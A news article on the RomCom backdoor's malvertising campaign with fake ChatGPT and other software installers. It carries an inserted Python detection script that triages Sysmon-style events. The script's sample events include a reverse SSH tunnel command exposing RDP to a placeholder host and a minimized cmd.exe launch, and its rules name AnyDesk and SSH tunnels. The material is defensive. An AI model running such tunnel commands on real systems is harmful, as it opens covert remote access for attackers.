That ChatGPT Google ad may be hiding some nasty malware

If you come across a Google ad promoting a website that offers downloads of well-known (or made-up) software, be very careful: it may well be part of a malvertising campaign.

RomCom is a backdoor that can do all sorts of nasty things: run cmd.exe, drop further malicious payloads on the target endpoint, exfiltrate data from compromised devices, run AnyDesk in a hidden window, compress folders and send them to attacker-controlled servers, and set up a proxy over SSH.

Furthermore, RomCom can grab screenshots from the compromised computer, steal cookies from popular browsers, and steal cryptocurrency wallet data, chat messages, and login credentials.

Recently, cybersecurity researchers from Trend Micro discovered a new malvertising campaign pushing RomCom to unsuspecting victims. The threat actors created a number of fake websites impersonating legitimate software such as GIMP, GoToMeeting, ChatGPT, WinDirStat, AstraChat, System Ninja, Devolutions' Remote Desktop Manager, and others.

Targets in Eastern Europe

They then bought advertising space on Google's ad network to promote those websites. Google ads aside, the attackers have also engaged in "highly targeted" phishing attacks against victims in Eastern Europe, according to the researchers.

While the websites appear to offer various software for download, what victims actually receive are MSI installers trojanized with a malicious DLL called InstallA.dll. This file drops three more DLLs onto the target device, which communicate with the command-and-control (C2) server and receive further instructions.

The researchers also explained that the attackers have started using the VMProtect packer to shield their code from antivirus programs, and that the payload is encrypted. Furthermore, the software is signed by companies allegedly based in North America that appear legitimate on paper; however, these companies' websites are "filled with fake or plagiarized content", BleepingComputer has found. A valid code signature is therefore not, on its own, evidence that one of these installers is safe.
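As an added example (not code from the article, Trend Micro or BleepingComputer), the infection chain described above can be expressed as a triage rule over Sysmon-style process-creation (Event ID 1) and image-load (Event ID 7) records: an msiexec.exe process that loads a DLL from a user-writable directory (even a validly signed one), spawns cmd.exe, launches AnyDesk, or starts an SSH tunnel. The events below are constructed for this example; the GUIDs, user name, signer name and remote host are made up, and the record shape is a simplified subset of Sysmon's real fields.

```python
"""Triage Sysmon-like events for the RomCom-style trojanized-MSI chain.

Added example. Records are a constructed, simplified subset of Sysmon
Event ID 1 (process create) and Event ID 7 (image load) fields.
"""
import re
from collections import defaultdict
from pathlib import PureWindowsPath

# Locations an installer has no business loading code from (user-writable).
USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\(AppData|Downloads)\\|\\Windows\\Temp\\", re.I)
# OpenSSH port-forward / SOCKS switches: -L, -R and -D followed by a port.
SSH_TUNNEL = re.compile(r"(?:^|\s)-(?:[LRD])\s*\d+", re.I)
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
REMOTE_TOOLS = {"anydesk.exe"}

MSIEXEC = r"C:\Windows\System32\msiexec.exe"
CMD = r"C:\Windows\System32\cmd.exe"

# Constructed sample telemetry: one malicious install (g-1 tree) and one benign install (g-9).
SAMPLE_EVENTS = [
    {"EventID": 1, "ProcessGuid": "{g-1}", "ParentProcessGuid": "{g-0}", "Image": MSIEXEC,
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'msiexec.exe /i "C:\Users\alice\Downloads\ChatGPT-Setup.msi"'},
    {"EventID": 7, "ProcessGuid": "{g-1}", "Image": MSIEXEC,
     "ImageLoaded": r"C:\Users\alice\AppData\Local\Temp\InstallA.dll",
     "Signed": "true", "SignatureStatus": "Valid", "Signature": "Example Signing Co (made up)"},
    {"EventID": 7, "ProcessGuid": "{g-1}", "Image": MSIEXEC,
     "ImageLoaded": r"C:\Windows\System32\msi.dll",
     "Signed": "true", "SignatureStatus": "Valid", "Signature": "Microsoft Windows"},
    {"EventID": 1, "ProcessGuid": "{g-2}", "ParentProcessGuid": "{g-1}", "Image": CMD,
     "ParentImage": MSIEXEC, "CommandLine": "cmd.exe /c start /min update.bat"},
    {"EventID": 1, "ProcessGuid": "{g-3}", "ParentProcessGuid": "{g-2}",
     "Image": r"C:\Users\alice\AppData\Local\Temp\AnyDesk.exe", "ParentImage": CMD,
     "CommandLine": "AnyDesk.exe"},
    {"EventID": 1, "ProcessGuid": "{g-4}", "ParentProcessGuid": "{g-2}",
     "Image": r"C:\Windows\System32\OpenSSH\ssh.exe", "ParentImage": CMD,
     "CommandLine": "ssh.exe -N -R 2222:127.0.0.1:3389 user@203.0.113.10"},
    {"EventID": 1, "ProcessGuid": "{g-9}", "ParentProcessGuid": "{g-0}", "Image": MSIEXEC,
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'msiexec.exe /i "C:\Users\alice\Downloads\LegitTool.msi"'},
    {"EventID": 7, "ProcessGuid": "{g-9}", "Image": MSIEXEC,
     "ImageLoaded": r"C:\Windows\System32\msi.dll",
     "Signed": "true", "SignatureStatus": "Valid", "Signature": "Microsoft Windows"},
]


def basename(path):
    return PureWindowsPath(path).name.lower()


def installer_root(guid, parent, image):
    """Walk up the process tree and return the nearest msiexec.exe ancestor, or None."""
    seen = set()
    while guid and guid not in seen:
        seen.add(guid)
        if basename(image.get(guid, "")) == "msiexec.exe":
            return guid
        guid = parent.get(guid)
    return None


def triage(events):
    """Map each msiexec.exe root to the suspicious behaviours seen in its process tree."""
    parent, image = {}, {}
    for e in events:
        if e["EventID"] == 1:
            parent[e["ProcessGuid"]] = e.get("ParentProcessGuid")
            image[e["ProcessGuid"]] = e["Image"]
        elif e["EventID"] == 7:
            image.setdefault(e["ProcessGuid"], e["Image"])
    findings = defaultdict(set)
    for e in events:
        root = installer_root(e["ProcessGuid"], parent, image)
        if root is None:
            continue
        if e["EventID"] == 7 and USER_WRITABLE.search(e["ImageLoaded"]):
            # Record the signer but do not trust it: the campaign's binaries carried
            # valid signatures from companies that turned out to be fronts.
            findings[root].add(f"dll_from_user_dir:{basename(e['ImageLoaded'])} "
                               f"signer={e.get('Signature', '?')}")
        elif e["EventID"] == 1:
            name = basename(e["Image"])
            cmd = e.get("CommandLine", "")
            if name in SHELLS:
                findings[root].add("shell_spawned:" + name)
            elif name in REMOTE_TOOLS:
                findings[root].add("remote_access_tool:" + name)
            elif name == "ssh.exe" and SSH_TUNNEL.search(cmd):
                findings[root].add("ssh_tunnel:" + cmd)
    return {root: sorted(f) for root, f in findings.items()}


def suspicious_installers(events, min_kinds=2):
    """Installer roots showing at least `min_kinds` distinct behaviour categories."""
    out = {}
    for root, found in triage(events).items():
        kinds = {f.split(":", 1)[0] for f in found}
        if len(kinds) >= min_kinds:
            out[root] = found
    return out


if __name__ == "__main__":
    for root, found in suspicious_installers(SAMPLE_EVENTS).items():
        print(root)
        for f in found:
            print("  ", f)
```

Requiring two distinct behaviour categories before alerting keeps a single legitimate installer that happens to spawn cmd.exe from paging anyone, while the full chain (user-directory DLL, shell, remote-access tool, SSH tunnel) trips every category at once. Real Sysmon logs need to be parsed from XML or EVTX first; this block assumes they have already been converted to dictionaries with the field names above.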

RomCom's goals vary from campaign to campaign, the publication further states, noting that the group has been seen engaging in both ransomware and espionage.

“Whatever the case, it is a versatile threat that can cause significant damage,” the report concludes.

Via: BleepingComputer

Sead is a seasoned freelance journalist based in Sarajevo, Bosnia and Herzegovina. He writes about IT (cloud, IoT, 5G, VPN) and cybersecurity (ransomware, data breaches, laws and regulations). In his career, spanning more than a decade, he’s written for numerous media outlets, including Al Jazeera Balkans. He’s also held several modules on content writing for Represent Communications.
